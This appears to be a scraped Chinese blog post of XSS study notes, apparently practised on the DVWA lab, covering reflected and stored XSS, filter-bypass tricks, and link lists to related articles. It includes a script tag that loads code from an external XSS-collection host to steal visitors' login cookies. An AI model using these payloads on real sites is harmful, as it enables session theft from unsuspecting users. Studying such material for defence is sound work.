第二輪學習筆記: XSS跨站腳本漏洞
扎頭髮,兩圈太鬆,三圈太緊,洗澡,往左一點燙死,往右一點凍死,吃泡麪,一桶吃不飽,兩桶吃不完,就像咱們的關係。。。web
---- 網易雲熱評安全
跨站腳本***(XSS),惡意***者在web頁面插入惡意script代碼,當用戶瀏覽該頁面時,惡意代碼就會被執行,達到***用戶的目的。cookie
造成緣由:程序對輸入和輸出的過濾不嚴格xss
1、反射型XSS:須要欺騙用戶本身點擊連接才能出發XSS代碼ide
一、在輸入窗口輸入123,點擊提交,審查元素,能夠看到提交的內容顯示在了網頁工具
二、在輸入框輸入:<script>alert('123')</script>,點擊提交,彈出對話框,說明存在漏洞web安全
2、漏洞利用blog
一、找一個xss平臺,註冊帳號,新建一個項目ip
二、複製關鍵代碼:<sCRiPt sRC=https://xss.wtf/ltkW></sCrIpT>,將該代碼複製到存在漏洞的頁面,而後提交it
三、打開xss平臺上建立的項目,咱們能夠獲得DVWA平臺登陸的cookie
3、存儲型XSS:用戶只要訪問存在該漏洞的頁面就會觸發
一、在對話框輸入<script>alert('123')</script>,提交,每次刷新頁面都會彈出,說明該處存在xss漏洞
二、在對話框輸入xss平臺上生成的代碼<sCRiPt sRC=https://xss.wtf/ltkW></sCrIpT>,點擊提交,只要訪問該頁面的用戶,都會在xss平臺上看到他的cookie信息
4、xss繞過
一、大小寫繞過,將<script>修改成<ScRipt>
二、雙寫繞過,將<script>修改成<Sc<script>Ript>
三、註釋繞過,將<script>修改成<scri<!--aaa--->pt>
四、實體轉換,將&改成&,將<改成<,將>改成>等等
禁止非法,後果自負
歡迎關注公衆號:web安全工具庫
- 1. 第二輪學習筆記:XSS跨站腳本漏洞
- 2. xss跨站腳本漏洞
- 3. XSS漏洞(跨站腳本)
- 4. 【第七章】XSS 跨站腳本漏洞
- 5. XSS跨站腳本漏洞 初學
- 6. 第二輪學習筆記:CSRF跨站請求僞造漏洞
- 7. XSS(跨站腳本)漏洞詳解
- 8. 跨站點腳本(xss)解析(二)保存型xss漏洞
- 9. xss跨站漏洞
- 10. XSS(跨站腳本)漏洞詳解之XSS跨站腳本攻擊漏洞的解決
- 更多相關文章...
- • Swift 下標腳本 - Swift 教程
- • 服務端腳本 指南 - 網站建設指南
- • Tomcat學習筆記(史上最全tomcat學習筆記)
- • Kotlin學習(二)基本類型
-
每一个你不满意的现在,都有一个你没有努力的曾经。
- 1. 第二輪學習筆記:XSS跨站腳本漏洞
- 2. xss跨站腳本漏洞
- 3. XSS漏洞(跨站腳本)
- 4. 【第七章】XSS 跨站腳本漏洞
- 5. XSS跨站腳本漏洞 初學
- 6. 第二輪學習筆記:CSRF跨站請求僞造漏洞
- 7. XSS(跨站腳本)漏洞詳解
- 8. 跨站點腳本(xss)解析(二)保存型xss漏洞
- 9. xss跨站漏洞
- 10. XSS(跨站腳本)漏洞詳解之XSS跨站腳本攻擊漏洞的解決